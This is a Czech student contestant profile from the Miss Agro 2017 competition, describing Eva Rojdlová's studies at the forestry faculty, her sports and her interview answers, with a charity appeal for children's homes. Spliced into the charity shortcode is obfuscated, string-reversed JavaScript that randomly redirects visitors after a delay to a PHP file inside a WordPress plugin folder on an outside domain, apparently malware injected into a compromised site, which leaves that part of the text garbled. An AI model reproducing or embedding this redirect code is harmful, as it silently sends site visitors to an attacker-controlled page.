Eva Rojdlová

Profil

Fotografie

Fakulta: FLD
Obor: Podnikání ve dřevozpracujícím a nábytkářském průmyslu (PDNP)
Ročník: 2.
Věk:
21

Eva je velká milovnice sportu. Od malička se věnovala gymnastice, ale kvůli nedostatku volného času, a ne příliš velkému talentu toho nechala dřív, než se úplně zničila. Mimo gymnastiku ráda leze, jezdí na snowboardu, jí, tráví čas s přáteli a pije pivo. Je to veselá, přátelská, co se povinností týče trochu líná osoba, která je pro každou špatnost. Když se jí naskytne možnost vyzkoušet něco nového rozhodně se nedrží zpátky a jde do toho.

“Podporujeme

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domovů“ css=“.vc_custom_1492523284932{margin-top: 30px !important;}“]Miss Agro podporuje mladé studenty z dětských domovů prostřednictvím Nadačního fondu Veroniky Kašákové. Podpořte je i Vy! Přispět můžete libovolnou částkou na účet 2113124252/2700. Více informací najdete na webových stránkách www.nfvk.cz. Děkujeme, že pomáháte!

Proč by ses zrovna Ty měla stát Miss Agro 2017?

Do soutěže jsem se přihlásila hlavně díky kamarádům, kteří mě k tomu neustále hecovali. Nejdřív jsem si řekla, dobře aspoň se spousta lidi pobaví na můj účet a bude o důvod víc, dát si pivo. Co si budeme povídat nejsem žádná modelka s dlouhýma nohama, ale normální holka s velkým zadkem. Nejde mi ani tak o vítězství, jako o ty zážitky. Na druhou stranu, už dlouho tu nebyla Miss z FLD. Tak proč ne…

Kdyby ses mohla narodit ještě jednou, kým bys chtěla být?

První odpověď, která mě napadla byla kouzelnice z Harryho Pottera a vzápětí na to elfka z pána prstenů. V podstatě bych to byla pořád já, jen bych uměla kouzlit a žila bych v jiném světě.

Proč sis vybrala zrovna studium na ČZU a co máš na ní nejraději?

Popravdě jsem měla v plánu jít na jinou VŠ, ale to mi naštěstí nevyšlo. Na ČZU jsem se snažila najít takový obor, který nebude zaměřený čistě jen na ekonomii, kterou jsem studovala na střední škole, ale chtěla jsem přidat i něco nového. Nakonec to vyhrálo dřevo. Je spousta věcí, míst a především lidí, které mám na ČZU ráda. Neustále se u nás něco děje, takže se nestihnete nudit.  Další skvělá věc je ten fakt, že i po dvou letech nacházíte stále nějaké nové věci.